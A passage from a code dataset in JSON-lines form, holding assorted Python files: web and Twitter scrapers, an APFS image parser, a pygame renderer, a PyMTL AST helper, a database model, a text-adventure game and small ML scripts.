item.img['data-src']\n\n # 右侧\n for item in wrapper.select('div[class=\"summary-pic\"]'):\n item.a['href'] = 'javascript:void(0)'\n del item.img['data-src']\n\n return image_urls, str(wrapper).replace('\\n', '').replace('\\r\\n', '')\n\n def __delWrapper(self, wrapper):\n for item in wrapper.select('div[class=\"album-list\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"mod-detailtable\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"configModuleBanner\"]'):\n item.decompose()\n\n for item in wrapper.find_all('div', id='hotspotmining_s'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"tashuo-bottom\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"tashuo-right\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"lemmaWgt-promotion-vbaike\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"lemmaWgt-sideRecommend\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"zhixin-group js-group\"]'):\n item.decompose()\n\n for item in wrapper.select('div[class=\"lemmaWgt-promotion-slide\"]'):\n item.decompose()\n\n return wrapper\n\n def __parseRelate(self, relates):\n items = []\n for item in relates:\n for li in 
item.select('li'):\n if (li.a):\n href = urlparse(li.a['href'])\n title = li.a['title']\n items.append({\n 'item': title,\n 'newLemmaId': href.path.split('/')[-1]\n })\n pass\n pass\n pass\n\n return items\n\n def __parseSpan(self, data):\n span_list = []\n for item in data:\n span_list.append(item.text.strip())\n return ','.join(span_list)\n\n def __parseData(self, data):\n temp = data.strip().split(':')\n key = temp[0].strip()\n value = temp[1].strip().strip('\"')\n return key, value\n\n def __getMainDict(select, items):\n '''\n 某些标题中带有逗号,特殊处理\n '''\n items_list = items.split()\n items_dict = {}\n items_list_len = int(len(items_list) / 2)\n for index in range(0, items_list_len):\n index = index * 2\n key = items_list[index].strip().strip(',').strip(':').strip('\"')\n value = items_list[index + 1].strip().strip(',').strip(':').strip('\"')\n items_dict[key] = value\n return items_dict\n","sub_path":"baike/spiders/mdx.py","file_name":"mdx.py","file_ext":"py","file_size_in_byte":8954,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"640624254","text":"import torch\nimport envwrapper\nimport agent\nimport numpy as np\n\ntorch.manual_seed(0)\nnp.random.seed(0)\n\n\nenv = envwrapper.Env(no_graphics=False)\nnA, nS, num_agents = env.return_sizes()\n\nagent_dict={\n \"name\": \"tennis\",\n}\n\na = agent.Agent(agent_dict=agent_dict)\n\na.load_state(enable_cuda=True)\n\na.evaluate(env, delay=0.0)\n","sub_path":"evaluate.py","file_name":"evaluate.py","file_ext":"py","file_size_in_byte":323,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139465700","text":"#!/usr/bin/env python\n\n\"\"\"\nParse an APFS and print a file tree\n\"\"\"\n\nfrom collections import defaultdict\nimport argparse\nfrom anytree import Node, RenderTree\nfrom kaitaistruct import __version__ as ks_version, KaitaiStream, BytesIO\nimport apfs\n\n\ndef list_extents(extent_entries, node_id):\n \"\"\" Get list of extents for given node_id \"\"\"\n extents = extent_entries[node_id]\n result = []\n for extent_entry in extents:\n result.append({\n \"offset\": extent_entry.key.content.offset,\n \"size\": extent_entry.record.size,\n \"block\": extent_entry.record.block\n })\n return result\n\nclass APFSTree:\n \"\"\" Parse an APFS and print a file tree \"\"\"\n\n apfs = None\n input_file = None\n blocksize = 0\n\n def get_block(self, idx):\n \"\"\" Get data of a single block \"\"\"\n self.input_file.seek(idx * self.blocksize)\n return self.input_file.read(self.blocksize)\n\n def read_block(self, block_num):\n \"\"\" Parse a singe block \"\"\"\n data = self.get_block(block_num)\n if not data:\n return None\n block = self.apfs.Block(\n KaitaiStream(BytesIO(data)), self.apfs, self.apfs)\n return block\n\n def get_entries(self, block):\n \"\"\" Get entries with type name \"\"\"\n name_entries = {}\n extent_entries = defaultdict(list)\n for _, entry in enumerate(block.body.entries):\n if block.header.type_block == self.apfs.BlockType.indexnode:\n # just follow the index blocks\n if block.header.type_content == self.apfs.ContentType.files:\n # we ignore these here as they only give us the IDs of other nodes,\n # but we want the block numbers, which we'll get from the\n # ContentType.location nodes in the else case below\n pass\n elif block.body.type_node == self.apfs.NodeType.fixed:\n newblock = self.read_block(entry.record.block_num)\n entries = self.get_entries(newblock)\n name_entries.update(entries['name'])\n 
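                # Editor's note (hedged): extent_entries is a defaultdict(list),
                # so the update() on the next line replaces the whole list for
                # any parent_id already collected from a sibling node instead of
                # merging; if duplicates across child nodes are possible, an
                # explicit merge such as this sketch (hypothetical, not in the
                # original) may be what is wanted:
                #   for k, v in entries['extent'].items():
                #       extent_entries[k].extend(v)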
extent_entries.update(entries['extent'])\n else:\n raise \"unexpected\"\n elif entry.key.type_entry.value == self.apfs.EntryType.extent.value:\n extent_entries[entry.key.parent_id].append(entry)\n elif entry.key.type_entry.value == self.apfs.EntryType.name.value:\n name_entries[entry.record.node_id] = entry\n\n return {'name': name_entries, 'extent': extent_entries}\n\n def list_children(self, pid, entries, parent_node, depth=1):\n \"\"\" List children of given pid \"\"\"\n for item_id, name_entry in entries['name'].items():\n\n if name_entry.key.parent_id == pid:\n name = name_entry.key.content.dirname\n extents = list_extents(entries['extent'], item_id)\n if any(extents):\n extent_str = \", extents: %s\" % extents\n else:\n extent_str = \"\"\n node_desc = name\n if self.verbose:\n type_item = str(name_entry.record.type_item).replace(\n \"ItemType.\", \"\")\n node_desc = \"%s (%s, node ID: %d%s)\" % (\n node_desc, type_item, name_entry.record.node_id, extent_str)\n tree_node = Node(node_desc, parent=parent_node)\n self.list_children(item_id, entries, tree_node, depth + 1)\n\n def add_volume(self, volume_block, apfs_tree):\n \"\"\" Add volume dir entries to tree \"\"\"\n\n # get volume superblock\n block = self.read_block(volume_block)\n block_map = block.body.block_map_block # mapping btree\n root_dir_id = block.body.root_dir_id # root dir id\n if self.verbose:\n vol_desc = \"%s (volume, Mapping-Btree: %d, Rootdir-ID: %d\" % (\n block.body.name, block_map, root_dir_id)\n else:\n vol_desc = block.body.name\n\n # get volume btree\n block = self.read_block(block_map)\n\n # get root btree node and parse it with all its children, collecting dir entries\n block = self.read_block(block.body.root)\n entries = self.get_entries(block)\n\n # create a tree from the found dir entries\n vol_node = Node(vol_desc, apfs_tree)\n self.list_children(1, entries, vol_node)\n\n def __init__(self):\n argparser = argparse.ArgumentParser(\n description='Print file tree for apfs images')\n argparser.add_argument(\n \"-v\",\n \"--verbose\",\n help=\"increase output verbosity\",\n action=\"store_true\")\n argparser.add_argument(\"image\", help=\"path to apfs image\")\n\n args = argparser.parse_args()\n self.verbose = args.verbose\n\n with open(args.image, 'rb') as input_file:\n\n self.input_file = input_file\n\n # get blocksize\n self.apfs = apfs.Apfs(KaitaiStream(input_file))\n block = self.apfs.Block(\n KaitaiStream(input_file), self.apfs, self.apfs)\n self.blocksize = block.body.block_size\n\n # get containersuperblock\n containersuperblock = self.read_block(0)\n\n # get list of volume ids\n apfss = containersuperblock.body.volumesuperblock_ids\n block_map = containersuperblock.body.block_map_block\n if args.verbose:\n print(\"Volume IDs: %s, Mapping-Btree: %d\" % (apfss, block_map))\n\n # get root of btree TODO: btree might be larger...\n block = self.read_block(block_map)\n\n # get leaf node\n apfs_locations = {}\n block = self.read_block(block.body.root)\n for _, entry in enumerate(block.body.entries):\n apfs_locations[entry.key.block_id] = entry.record.block_num\n if args.verbose:\n print(\"Volume Blocks:\", apfs_locations, \"\\n\")\n\n apfs_tree = Node(\"apfs\")\n\n for _, volume_block in apfs_locations.items():\n self.add_volume(volume_block, apfs_tree)\n\n for pre, _, node in RenderTree(apfs_tree):\n print(\"%s%s\" % (pre, node.name))\n\n\nif __name__ == \"__main__\":\n 
APFSTree()\n","sub_path":"parser/apfs_tree.py","file_name":"apfs_tree.py","file_ext":"py","file_size_in_byte":6342,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"388706108","text":"from CoSource import *\nfrom CoGameM import *\n# Render Work here, for local player only\nclass CoRender:\n def __init__(self, screen):\n # tolerate range for objects displayed in sight\n self.tolerateWH = TOLERANCE_RANGE \n self.screen = screen\n self.screenWH = (screen.get_width(),\n screen.get_height())\n self.display_range = (float(self.tolerateWH[0]+self.screenWH[0]/2)/PPM,\n float(self.tolerateWH[1]+self.screenWH[1]/2)/PPM)\n # choose game objects and display them if insight\n self.cur_render_origin = (0,0)\n # encode_data format (pos, encode_data) \n # obj format (pos, img, (ix, iy, w, h), angle, front_back), pos is the center of the image\n def renderProcessor(self, objmultigroups): \n self.screen.fill((0, 0, 0))\n for objgroups in objmultigroups:\n for obj in objgroups:\n # if self.isInSight((obj[0][0]*PPM, obj[0][1]*PPM)):\n # decode and restore the encode_data\n decode_data = decodeRenderInfo(obj[1])\n # drange = (self.shift_len*self.image_idx, 0, self.shift_len, IMAGES[self.myimage].get_height())\n drange = (ENTITY_SHIFT[decode_data[0]]*decode_data[1], 0, ENTITY_SHIFT[decode_data[0]], IMAGES[decode_data[0]].get_height())\n tmp_image = IMAGES[decode_data[0]].subsurface(drange)\n if decode_data[3]: # flip the image if marked\n tmp_image = pygame.transform.flip(tmp_image, True, False)\n # be careful, pygame take ccw as default\n tmp_image = pygame.transform.rotate(tmp_image, 0.0-decode_data[2]) \n self.renderBlit(tmp_image, (self.screenWH[0]/2-\n (self.cur_render_origin[0]\n -obj[0][0])*PPM-tmp_image.get_width()/2,\n self.screenWH[1]/2+(self.cur_render_origin[1]-obj[0][1])*PPM\n -tmp_image.get_height()/2))\n # self.screen.blit(tmp, (obj[0][0]*PPM-tmp.get_width()/2, self.screenWH[1]-(obj[0][1]*PPM+tmp.get_height()/2)))\n def renderBlit(self, image, pos):\n self.screen.blit(image, pos)\n def renderDisplay(self):\n pygame.display.flip()\n def updateRenderOrigin(self, view_center): # in meters, the center of viewpos in phyworld\n if view_center:\n self.cur_render_origin = view_center\n def isInSight(self, entity_pos, view_center): # all in meters\n dx, dy = math.fabs(entity_pos[0]-view_center[0]), math.fabs(entity_pos[1]-view_center[1])\n return dx <= self.display_range[0] and dy <= self.display_range[1]\n # pos should the position of the screen-center\n # def updateRenderOrigin(self, player_pos, mouse_pos): \n # self.cur_render_origin = (VIEW_SCALA*(mouse_pos[0]\n # -self.screenWH[0]/2)+PPM*player_pos[0],\n # VIEW_SCALA*(self.screenWH[1]/2\n # -mouse_pos[1])+PPM*player_pos[1])\n # def isInSight(self, pos): # all in pixels, pos is the center of the image\n # dx, dy = math.fabs(pos[0]-self.cur_render_origin[0]), math.fabs(pos[1]-self.cur_render_origin[1])\n # return dx <= self.display_range[0] and dy <= self.display_range[1]\n def quit(self):\n pass","sub_path":"source/CoRenderM.py","file_name":"CoRenderM.py","file_ext":"py","file_size_in_byte":3426,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"556088319","text":"from database.database import *\nfrom database.student import Student\nfrom sqlalchemy.orm.exc import NoResultFound\nfrom database.event import Event\nimport random\n\n\nclass EventVisitor(Base):\n __tablename__ = 'eventvisitor'\n __table_args__ = {'extend_existing': True}\n\n id = 
sa.Column(sa.Integer, primary_key=True)\n\n event_id = sa.Column(sa.Integer, sa.ForeignKey('event.id'))\n event = relationship('Event')\n\n student_id = sa.Column(sa.Integer, sa.ForeignKey('student.id'))\n student = relationship('Student')\n\n note = sa.Column(sa.String(256))\n\n @staticmethod\n def add_visitors():\n if len(EventVisitor.get_all_visitors()) > 0:\n return\n else:\n for event in Event.get_all_events():\n s_id_list = random.sample(range(1, 61), random.randint(20, 40))\n for s_id in s_id_list:\n event_visit = EventVisitor(event_id=event.id, student_id=s_id)\n session.add(event_visit)\n\n session.commit()\n\n print(\"visitors added\")\n\n @staticmethod\n def get_all_visitors():\n return [visitor for visitor in session.query(EventVisitor).all()]\n\n @staticmethod\n def add_visitor(event_id, student_id, note=''):\n event_visit = EventVisitor(event_id=event_id, student_id=student_id, note=note)\n session.add(event_visit)\n session.commit()\n return event_visit\n\n @staticmethod\n def get_visitors(event_id):\n return [visitor.student_id for visitor in session.query(EventVisitor).filter(EventVisitor.event_id == event_id)]\n\n @staticmethod\n def get_visitor_by_id(visitor_id):\n return session.query(EventVisitor).filter(EventVisitor.student_id == visitor_id).one()\n\n @staticmethod\n def check_visitor(event_id, student_id):\n try:\n session.query(EventVisitor).filter(EventVisitor.event_id == event_id). \\\n filter(EventVisitor.student_id == student_id).one()\n except NoResultFound:\n return False\n\n @staticmethod\n def delete_visitor(event_id, student_id):\n session.delete(session.query(EventVisitor).filter(EventVisitor.event_id == event_id).\n filter(EventVisitor.student_id == student_id).one())\n session.commit()\n\n @staticmethod\n def get_visitor_students(group_id):\n return session.query(Student, EventVisitor).filter(Student.group_id == group_id).filter(\n EventVisitor.student_id == Student.id).all()\n\n\nBase.metadata.create_all(conn)\n","sub_path":"database/event_visitor.py","file_name":"event_visitor.py","file_ext":"py","file_size_in_byte":2538,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"367664350","text":"#!/usr/bin/python3\nimport os\nimport sys\nimport re\nfrom subprocess import call, Popen, PIPE\nfrom shutil import copy2\n\nWINDOWS_DIR = 'c:\\\\users\\\\reed9\\\\Strawberry\\\\perl\\\\bin'\nUNIX_DIR = ''\n\nos.chdir(os.path.expanduser('~/diss'))\n\ndef run_wordcount():\n FULL_PERL = UNIX_DIR + 'perl'\n command = FULL_PERL + ' scripts/texcount.pl dissertation.tex -inc' \n outfile = 'wordcount.tex'\n with open(outfile, 'w') as file_output:\n proc = call (command.split(), stdout=file_output)\n\ndef calculate_daily_count():\n git_diff = u'git diff @{04:00} -- wordcount.tex'\n pattern = '.Words in text: [0-9]{5}'\n proc1 = Popen(git_diff.split(), stdout=PIPE)\n rv = re.findall(pattern, proc1.communicate()[0].decode())\n return rv\n\ndef main():\n run_wordcount()\n print(calculate_daily_count())\n\nif __name__ == \"__main__\":\n main()\n","sub_path":"scripts/count1.py","file_name":"count1.py","file_ext":"py","file_size_in_byte":815,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"209010242","text":"\"\"\"\n========================================================================\nAstHelper.py\n========================================================================\nThis file collects PyMTL ast visitors.\n\nAuthor : Shunning Jiang\nDate : Jan 17, 
2018\n\"\"\"\n\nimport ast\n\n\nclass DetectVarNames( ast.NodeVisitor ):\n\n def __init__( self, upblk ):\n self.upblk = upblk\n self.closure = {}\n for i, var in enumerate( upblk.__code__.co_freevars ):\n try: self.closure[ var ] = upblk.__closure__[i].cell_contents\n except ValueError: pass\n\n # Helper function to get the full name containing \"s\"\n\n def _get_full_name( self, node ):\n\n # We store the name/index linearly, and store the corresponding ast\n # nodes linearly for annotation purpose\n obj_name = []\n nodelist = []\n\n # First strip off all slices\n # s.x[1][2].y[i][3]\n slices = []\n while isinstance( node, ast.Subscript ) and isinstance( node.slice, ast.Slice ):\n lower = node.slice.lower\n upper = node.slice.upper\n # If the slice looks like a[i:i+1] where i is variable, I assume it\n # would access the whole variable\n\n low = up = None\n\n if isinstance( lower, ast.Num ):\n low = node.slice.lower.n\n elif isinstance( lower, ast.Name ):\n x = lower.id\n if x in self.upblk.__globals__:\n low = self.upblk.__globals__[ x ] # TODO check low is int\n elif x in self.closure:\n low = self.closure[ x ]\n\n if isinstance( upper, ast.Num ):\n up = node.slice.upper.n\n elif isinstance( upper, ast.Name ):\n x = upper.id\n if x in self.upblk.__globals__:\n up = self.upblk.__globals__[ x ] # TODO check low is int\n elif x in self.closure:\n up = self.closure[ x ]\n\n if low is not None and up is not None:\n slices.append( slice(low, up) )\n # FIXME\n # else:\n\n nodelist.append( node )\n node = node.value\n\n # s.x[1][2].y[i]\n while True:\n num = []\n while isinstance( node, ast.Subscript ) and \\\n isinstance( node.slice, ast.Index ):\n v = node.slice.value\n n = \"*\"\n\n if isinstance( v, ast.Num ):\n n = v.n\n elif isinstance( v, ast.Name ):\n x = v.id\n if x in self.upblk.__globals__: # Only support global const indexing for now\n n = self.upblk.__globals__[ x ]\n elif x in self.closure:\n n = self.closure[ x ]\n elif isinstance( v, ast.Attribute ): # s.sel, may be constant\n self.visit( v )\n elif isinstance( v, ast.Call ): # int(x)\n for x in v.args:\n self.visit(x)\n\n num.append(n)\n\n nodelist.append( node )\n node = node.value\n\n if isinstance( node, ast.Attribute ):\n obj_name.append( (node.attr, num[::-1]) )\n elif isinstance( node, ast.Name ):\n obj_name.append( (node.id, num[::-1]) )\n elif isinstance( node, ast.Call ): # a.b().c()\n # FIXME?\n return None, None\n else:\n assert isinstance( node, ast.Str ) # filter out line_trace\n return None, None\n\n nodelist.append( node )\n\n if not hasattr( node, \"value\" ):\n break\n node = node.value\n\n if slices:\n assert len(slices) == 1, \"Multiple slices at the end of s.%s in update block %s\" % \\\n ( \".\".join( [ obj_name[i][0] + \"\".join([\"[%s]\" % x for x in obj_name[i][1]]) for i in range(len(obj_name)) ] ) \\\n + \"[%d:%d]\" % (x[0], x[1]), self.upblk.__name__ )\n\n obj_name[0][1].append( slices[0] )\n\n obj_name = obj_name[::-1]\n nodelist = nodelist[::-1]\n return obj_name, nodelist\n\nclass DetectReadsWritesCalls( DetectVarNames ):\n\n def enter( self, node, read, write, calls ):\n self.read = []\n self.write = []\n self.calls = []\n self.visit( node )\n read.extend ( self.read )\n write.extend( self.write )\n calls.extend( self.calls )\n\n def visit_Attribute( self, node ): # s.a.b\n obj_name, nodelist = self._get_full_name( node )\n if not obj_name: return\n\n pair = (obj_name, nodelist)\n\n if isinstance( node.ctx, ast.Load ):\n self.read.append( pair )\n elif isinstance( node.ctx, ast.Store ):\n 
self.write.append( pair )\n else:\n assert False, type( node.ctx )\n\n def visit_Subscript( self, node ): # s.a.b[0:3] or s.a.b[0]\n obj_name, nodelist = self._get_full_name( node )\n if not obj_name: return\n\n pair = (obj_name, nodelist)\n\n if isinstance( node.ctx, ast.Load ):\n self.read.append( pair )\n elif isinstance( node.ctx, ast.Store ):\n self.write.append( pair )\n else:\n assert False, type( node.ctx )\n\n self.visit( node.slice )\n\n def visit_Call( self, node ):\n obj_name, nodelist = self._get_full_name( node.func )\n if not obj_name: return\n\n self.calls.append( (obj_name, nodelist) )\n\n for x in node.args:\n self.visit( x )\n\nclass DetectMethodCalls( DetectVarNames ):\n\n def enter( self, node, methods ):\n self.methods = []\n self.visit( node )\n methods.extend( self.methods )\n\n def visit_Call( self, node ):\n obj_name = self.get_full_name( node.func )\n if not obj_name: return # to check node.func.id\n\n pair = (obj_name, node)\n\n self.methods.append( pair )\n\n for x in node.args:\n self.visit( x )\n\ndef extract_reads_writes_calls( f, tree, read, write, calls ):\n\n # Traverse the ast to extract variable writes and reads\n # First check and remove @s.update and empty arguments\n assert isinstance(tree, ast.Module)\n tree = tree.body[0]\n assert isinstance(tree, ast.FunctionDef)\n\n for stmt in tree.body:\n DetectReadsWritesCalls( f ).enter( stmt, read, write, calls )\n\ndef get_method_calls( tree, upblk, methods ):\n DetectMethodCalls( upblk ).enter( tree, methods )\n","sub_path":"pymtl3/dsl/AstHelper.py","file_name":"AstHelper.py","file_ext":"py","file_size_in_byte":5779,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"501324809","text":"'''\nCreated on 06/01/2013\n\n@author: \n Victor Rodriguez \n Jimmy Banchon\n'''\n# Importacion de librerias\nimport pygame\nimport Sonido\nimport random, os, sys\n\n#Declaracion de funciones\ndef eleccion(name):\n n = True\n\n pygame.mixer.music.load(name)\n pygame.mixer.music.play(-1)\n while n:\n n_puerta = 0\n n_puerta= input('''\n [1] Puerta 1\n [2] Puerta 2\n Escoja 1 sola puerta: ''')\n \n if (2 >= n_puerta > 0):\n n = False\n pygame.mixer.music.stop()\n \n return n_puerta\n\ndef eleccion_dragon(name):\n n = True\n\n while n:\n n_puerta = 0\n pygame.mixer.music.load(name)\n pygame.mixer.music.play(-1)\n n_puerta= input('''\n [1] Combatir contra el Dragon\n [2] Intentar huir\n Escoja 1 sola puerta: ''')\n \n if (2 >= n_puerta > 0):\n n = False\n pygame.mixer.music.stop()\n \n return n_puerta\n\n# Declaracion del main\n\nif __name__ == \"__main__\":\n\n pygame.mixer.init()\n \n numero = 0\n\n intro = Sonido.Sonido(\"Sounds/intro.wav\")\n \n decision = Sonido.Sonido(\"Sounds/2puertas_mixdown.wav\")\n puerta = Sonido.Sonido(\"Sounds/puerta.wav\")\n #Ramal 1\n guardian = Sonido.Sonido(\"Sounds/pelea_con_guardianes.wav\")\n escaleras = Sonido.Sonido(\"Sounds/escaleras.wav\")\n #decision\n narracion = Sonido.Sonido(\"Sounds/narracion.wav\")\n trampa = Sonido.Sonido(\"Sounds/trampa_mixdown_nuevo.wav\")\n \n #Opcion 2\n dragon = Sonido.Sonido(\"Sounds/pelea_dragon_mixdown.wav\")\n pelea_dragon_ganada = Sonido.Sonido(\"Sounds/pelea_dragon_gana_mixdown.wav\")\n pelea_dragon_muere = Sonido.Sonido(\"Sounds/pelea_dragon_muere_mixdown.wav\")\n caballero_deborado = Sonido.Sonido(\"Sounds/pelea_dragon_muere_mixdown.wav\")\n princesa = Sonido.Sonido(\"Sounds/final_despues_dragon_mixdown.wav\")\n \n #Ramal 2\n normal = Sonido.Sonido(\"Sounds/Normal_1_mixdown.wav\")\n #escaleras\n 
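    # Editor's note (hedged): the combat branches further below decide the
    # outcome with `aleat = int(random.random())`, which truncates a float in
    # [0, 1) and therefore always yields 0, so the `aleat == 1` victory branch
    # can never be taken; a fair coin flip such as `aleat = random.randint(0, 1)`
    # is presumably what was intended. Note also that `caballero_gana_juego`
    # below is built from the incomplete path "Sounds/"; that elided file name
    # is left as-is.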
#decision\n \n #Opcion 1\n troll = Sonido.Sonido(\"Sounds/pelea_troll_mixdown.wav\")\n juego = Sonido.Sonido(\"Sounds/eleccion_juego_mixdown.wav\")\n caballero_pierde_juego = Sonido.Sonido(\"Sounds/eleccion_juego_muerto_mixdown.wav\")\n\n caballero_gana_juego = Sonido.Sonido(\"Sounds/\") \n \n pelea_mago = Sonido.Sonido(\"Sounds/pelea_mago_mixdown.wav\")\n pelea_mago_gana = Sonido.Sonido(\"Sounds/pelea_mago_gana_mixdown.wav\") \n pelea_mago_pierde = Sonido.Sonido(\"Sounds/pelea_mago_muere_mixdown.wav\")\n \n \n #Implementacion -------------------------------------------------------\n intro.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja el numero de puerta que sea dirigirse:')\n numero = eleccion(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if numero==1:\n guardian.reproducir()\n escaleras.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja el numero de puerta que sea dirigirse:')\n numero = eleccion(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if(numero==1):\n narracion.reproducir()\n trampa.reproducir()\n sys.exit()\n else:\n dragon.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja que accion desea hacer:')\n numero = eleccion_dragon(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if(numero == 1):\n aleat = int(random.random())\n \n if(aleat == 1):\n pelea_dragon_ganada.reproducir()\n princesa.reproducir()\n else:\n pelea_dragon_muere.reproducir()\n else:\n caballero_deborado.reproducir()\n sys.exit() \n else:\n normal.reproducir()\n escaleras.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja el numero de puerta que sea dirigirse:')\n numero = eleccion(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if(numero == 1):\n troll.reproducir()\n juego.reproducir()\n \n aleat = 1 + int(random.random()*5)\n numero = input('Escriba el numero que usted cree que tiene Zagal: ') \n \n if(aleat == numero):\n caballero_gana_juego.reproducir()\n dragon.reproducir()\n \n os.system(\"cls\")\n decision.reproducir()\n print('Escoja que accion desea hacer:')\n numero = eleccion_dragon(\"Sounds/sonido_espera.wav\")\n puerta.reproducir() \n \n if(numero == 1):\n aleat = int(random.random())\n \n if(aleat == 1):\n pelea_dragon_ganada.reproducir()\n princesa.reproducir()\n else:\n pelea_dragon_muere.reproducir()\n else:\n caballero_deborado.reproducir()\n sys.exit()\n else:\n caballero_pierde_juego.reproducir()\n \n else:\n pelea_mago.reproducir()\n \n numero = input('''\n Escoja que accion tomara contra el mago Zagal:\n [1] Rebotarle el hechizo con la espada\n [2] Cubrirse de los hechizos\n ''')\n \n if(numero == 1):\n pelea_mago_gana.reproducir()\n princesa.reproducir()\n else:\n pelea_mago_pierde.reproducir()\n \n sys.exit() ","sub_path":"test/124.py","file_name":"124.py","file_ext":"py","file_size_in_byte":5892,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"139355796","text":"from random import shuffle\n\nclass Aleatoire(object):\n def __init__(self,liste):\n self.taille=len(liste)\n self.liste=liste\n shuffle(liste)\n self.index=0\n\n def __iter__(self):\n return self\n\n def __next__(self):\n if self.index==self.taille:\n raise StopIteration\n else:\n suivant=self.liste[self.index]\n self.index+=1\n return suivant\n \nfor i in Aleatoire([1,2,3,4]):\n print(i,end=\"\")\n","sub_path":"L2/Semestre 
3/POO/TD/td8.py","file_name":"td8.py","file_ext":"py","file_size_in_byte":491,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"140623251","text":"import mxnet as mx\nfrom sklearn.metrics import accuracy_score, roc_auc_score, mean_squared_error\nimport pandas as pd\n\ntest_df = pd.read_csv(\"data/test\", sep=\"\\t\")\n\ndef load_mldata_iter(df, batch_size):\n user = mx.nd.array(df['client_id'])\n item = mx.nd.array(df['style_variant_id'])\n score = mx.nd.array(df['response_value'])\n\n return mx.io.NDArrayIter(\n data = {'user':user, 'item':item}, \n label = {'score': score}, \n batch_size = batch_size)\n\ntest_iter = load_mldata_iter(test_df, 2000)\n\n\nmodel_loaded = mx.model.FeedForward.load(\"model/resnet-24-log\", 50)\nresult = model_loaded.predict(test_iter)\n\nprint(test_df[\"response_value\"])[:50]\nprint(\"-------------\")\nprint(result[:50])\n\nacc = accuracy_score(test_df[\"response_value\"].values, result)\nauc = roc_auc_score(test_df[\"response_value\"].values, result)\nrmse = mean_squared_error(test_df[\"response_value\"].values, result) ** 0.5\n\nprint(\"Error: {0: .4f}\".format(1 - acc))\nprint(\"AUC: {0: .4f}\".format(auc))\nprint(\"RMSE: {0: .4f}\".format(auc))\n","sub_path":"recommender/test-mx.py","file_name":"test-mx.py","file_ext":"py","file_size_in_byte":1043,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"77"} +{"seq_id":"606859362","text":"from twitterAccess_code import TwitterAccess\nimport tweepy\nimport time\nfrom pathlib import Path\nimport re\nimport sys\n\n'''\n1. Changing search_tweets.count to change the number of tweets you want to search\nin one page. max = 100\n2. Changing search_tweets.pages to change how many pages the tweets you want to\nsearch. default = 10000\n3. 'q' is the keyword you want to search.\n'''\nkey_num = 0\n\n\ndef find_last_line(file_path):\n with open(file_path, 'rb') as f:\n off = -50\n while True:\n f.seek(off, 2)\n lines = f.readlines()\n if len(lines) >= 2:\n last_line = lines[-1]\n break\n off *= 2\n return last_line\n\n\ndef search_tweets(search_word, key_flag):\n global key_num\n api = TwitterAccess()\n api2 = api.s_access_token(key_flag, key_num)\n # try:\n # search_status = api2.search(search_word, result_type='recent',\n # count=10)\n stop_flag = 0\n tweet_number = 0\n last_id = 0\n last_num = 0\n RT_counter = 0\n path = \"../tweettext.txt\"\n log_path = \"../log.txt\"\n\n check_file = Path(path)\n print(\"finding the file {}...\".format(path))\n if check_file.exists():\n print(\"File exist, write after the last line.\")\n temp_id = re.search(r'/\\*(.*?)\\*(.*?)\\*/', str(find_last_line(path)))\n # print(\"..\", temp_id.group(2))\n if temp_id:\n last_num = int(temp_id.group(1)) + 1\n last_id = temp_id.group(2)\n print(\"Start at number:\", last_num, \"id:\", last_id)\n tweet_number = last_num\n else:\n print(\"Something wrong, check\", path)\n else:\n print(\"File is not exist, create the new file.\")\n\n for search_status in tweepy.Cursor(api2.search, q=search_word,\n # result_type='recent',\n tweet_mode='extended',\n lang='en',\n max_id=str(int(last_id) - 1),\n count=100).pages(10000):\n # print(\"Get tweets successfully ... \\n\\n\")\n # print(search_status)\n \n with open(path, \"a\") as file_text:\n for i in range(0, len(search_status)):\n s_temp_text = search_status[i].full_text.replace(\"\\n\", \"
\")\n if re.match(r'^RT', s_temp_text):\n RT_counter += 1\n else:\n file_text.write(\"/*{2}*{1}*/{0}\\n\".format(\n s_temp_text,\n search_status[i].id,\n tweet_number + 1))\n\n # print(\"/*{2}*{1}*/{0}\".format(\n # s_temp_text,\n # search_status[i].id,\n # tweet_number + 1))\n tweet_number += 1\n time.sleep(2)\n stop_flag += 1\n flag2 = 0\n if stop_flag > 150:\n with open(log_path, \"a\") as f_log:\n flag2 = 1\n f_log.write(\n \"[{}]sleeped ...\\n\".format(\n time.strftime(\n \"%Y-%m-%d %H:%M:%S\",\n time.localtime())))\n time.sleep(60 * 8)\n stop_flag = 0\n if key_num == 0:\n key_num = 1\n elif key_num == 1:\n key_num = 0\n\n if flag2 == 1:\n print(\"if flag2...\")\n with open(log_path, \"a\") as f_log:\n f_log.write(\n \"[{0}]Totally deleted useless tweets {1}\\n\".format(\n time.strftime(\n \"%Y-%m-%d %H:%M:%S\",\n time.localtime()),\n RT_counter))\n break\n # except BaseException:\n # pass\n # print(\"stop at page:\"+)\n # print(\"ERROR! May be the key you inputted is wrong! \\nPlease try again...\")\n # key_flag = 1\n # # api2=api.s_access_token(key_flag)\n # search_tweets(searchword, 